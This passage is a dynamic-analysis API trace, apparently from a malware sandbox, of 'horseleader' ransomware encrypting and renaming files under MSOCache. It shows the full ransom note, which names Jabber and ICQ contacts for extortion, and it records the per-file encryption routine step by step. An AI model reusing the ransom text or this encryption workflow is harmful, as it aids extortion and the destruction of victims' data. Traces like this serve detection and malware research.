lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0189.740] CloseHandle (hObject=0x158) returned 1 [0189.743] GetProcessHeap () returned 0x780000 [0189.743] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0189.743] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.horseleader") returned 97 [0189.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.horseleader")) returned 1 [0189.750] GetProcessHeap () returned 0x780000 [0189.750] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0189.750] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0189.750] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0189.750] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\#Decrypt#.txt") returned 89 [0189.750] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0189.751] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0189.751] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0189.753] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0189.753] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0189.753] CloseHandle (hObject=0x21c) returned 1 [0189.753] GetProcessHeap () returned 0x780000 [0189.753] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0189.753] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0189.753] lstrcmpiW (lpString1="Proofing.msi", lpString2="Windows") returned -1 [0189.754] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0189.754] StrStrIW (lpFirst="Proofing.msi", lpSrch=".horseleader") returned 0x0 [0189.754] lstrcmpW (lpString1="Proofing.msi", lpString2="#Decrypt#.txt") returned 1 [0189.754] lstrcmpW (lpString1="Proofing.msi", lpString2="_uninstalling_.png") returned 1 [0189.754] lstrlenW (lpString=".testttjffg") returned 11 [0189.754] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", lpSrch=".testttjffg") returned 0x0 [0189.754] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0189.754] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0189.754] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0189.755] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0189.755] StrStrW (lpFirst="Proofing.msi", lpSrch=".txt") returned 0x0 [0189.755] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=868864) returned 1 [0189.755] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.755] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.759] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.759] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.759] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x67900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.759] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.773] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.773] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.773] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xcf200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.773] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0190.074] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0190.074] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0190.074] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.075] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0190.075] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0190.075] CloseHandle (hObject=0x21c) returned 1 [0190.620] GetProcessHeap () returned 0x780000 [0190.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0190.620] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.horseleader") returned 91 [0190.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.horseleader")) returned 1 [0190.621] GetProcessHeap () returned 0x780000 [0190.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0190.621] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0190.621] lstrcmpiW (lpString1="Proofing.xml", lpString2="Windows") returned -1 [0190.621] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0190.621] StrStrIW (lpFirst="Proofing.xml", lpSrch=".horseleader") returned 0x0 [0190.621] lstrcmpW (lpString1="Proofing.xml", lpString2="#Decrypt#.txt") returned 1 [0190.621] lstrcmpW (lpString1="Proofing.xml", lpString2="_uninstalling_.png") returned 1 [0190.621] lstrlenW (lpString=".testttjffg") returned 11 [0190.622] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".testttjffg") returned 0x0 [0190.622] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0190.622] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0190.622] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0190.622] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0190.622] StrStrW (lpFirst="Proofing.xml", lpSrch=".txt") returned 0x0 [0190.622] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=811) returned 1 [0190.622] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x32b, lpOverlapped=0x0) returned 1 [0190.945] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0190.945] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x32b, lpOverlapped=0x0) returned 1 [0190.945] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.946] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0190.946] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0190.946] CloseHandle (hObject=0x21c) returned 1 [0190.947] GetProcessHeap () returned 0x780000 [0190.947] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0190.947] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.horseleader") returned 91 [0190.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.horseleader")) returned 1 [0190.948] GetProcessHeap () returned 0x780000 [0190.948] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0190.949] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0190.949] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0190.949] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0190.949] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0190.949] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0190.949] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0190.949] lstrlenW (lpString=".testttjffg") returned 11 [0190.949] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0190.949] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0190.949] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0190.949] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0190.951] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0190.972] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0190.972] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=5884) returned 1 [0190.972] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x16fc, lpOverlapped=0x0) returned 1 [0191.160] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.161] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x16fc, lpOverlapped=0x0) returned 1 [0191.162] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.162] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.162] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.163] CloseHandle (hObject=0x21c) returned 1 [0191.169] GetProcessHeap () returned 0x780000 [0191.169] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0191.169] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0191.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0191.172] GetProcessHeap () returned 0x780000 [0191.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0191.172] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0191.172] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0191.172] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0191.173] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0191.174] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0191.174] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0191.175] lstrlenA 